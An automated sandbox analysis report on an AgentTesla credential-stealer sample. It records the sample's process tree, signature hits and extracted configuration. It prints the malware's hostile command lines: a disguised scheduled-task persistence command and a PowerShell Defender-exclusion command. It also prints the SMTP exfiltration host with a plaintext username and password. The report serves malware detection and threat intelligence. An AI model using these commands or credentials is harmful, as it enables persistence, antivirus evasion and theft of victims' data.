Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe

Overview

General Information

Sample name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
Analysis ID:1437973
MD5:e184c8b191b12744e919b3b95ce39a0e
SHA1:fe25931e12b1f5807b95cf222cd9ee74c2cb7ea2
SHA256:df9e900bc2aba3462d0b9d2fb4e81719604f4c63871a2225edce136c140e8fc8
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Sigma detected: Schedule system process
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Disables UAC (registry)
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7748 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7776 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • svchost.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • InstallUtil.exe (PID: 3068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • jsc.exe (PID: 5284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
        • RegSvcs.exe (PID: 7588 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • CasPol.exe (PID: 7556 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
        • AddInProcess32.exe (PID: 7688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • MSBuild.exe (PID: 7752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7680 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 7788 cmdline: C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7792 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 8028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • InstallUtil.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • WerFault.exe (PID: 7284 cmdline: C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 8156 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7224 cmdline: C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7324 cmdline: C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 8204 cmdline: C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 8712 cmdline: C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • AddInProcess32.exe (PID: 7660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 7740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 8252 cmdline: C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 8396 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jsc.exe (PID: 8676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • jsc.exe (PID: 8696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • WerFault.exe (PID: 8796 cmdline: C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • vexplorers.exe (PID: 8996 cmdline: "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • conhost.exe (PID: 9004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vexplorers.exe (PID: 9180 cmdline: "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • conhost.exe (PID: 9188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 40 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.svchost.exe.2169004f2c0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              10.2.svchost.exe.2169004f2c0.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                10.2.svchost.exe.2169004f2c0.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x341e6:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x34258:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x342e2:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x34374:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x343de:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x34450:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x344e6:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x34576:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                10.2.svchost.exe.2169004f2c0.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.svchost.exe.2169004f2c0.3.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 9 entries

                    Sigma Signatures

                    Networking

                    barindex
                    Sigma detected: MSBuild connects to smtp port
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7752, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessId: 7520, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe", ParentImage: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ParentProcessId: 7520, ParentProcessName: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7676, ProcessName: cmd.exe
                    Sigma detected: Invoke-Obfuscation VAR+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe", ParentImage: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ParentProcessId: 7520, ParentProcessName: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7676, ProcessName: cmd.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7972, ProcessName: powershell.exe
                    Sigma detected: Silenttrinity Stager Msbuild Activity
                    Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7752, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
                    Sigma detected: Suspect Svchost Activity
                    Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7224, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7792, ProcessName: svchost.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7224, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7792, ProcessName: svchost.exe
                    Sigma detected: Conhost Spawned By Uncommon Parent Process
                    Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7800, ProcessName: conhost.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessId: 7520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7972, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 8084, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49742
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 7748, ProcessName: schtasks.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7704, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7872, ProcessName: svchost.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7972, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7224, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7792, ProcessName: svchost.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe", ParentImage: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ParentProcessId: 7520, ParentProcessName: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7676, ProcessName: cmd.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\AppData\Roaming\svchost.exeVirustotal: Detection: 36%Perma Link
                    Multi AV Scanner detection for submitted file
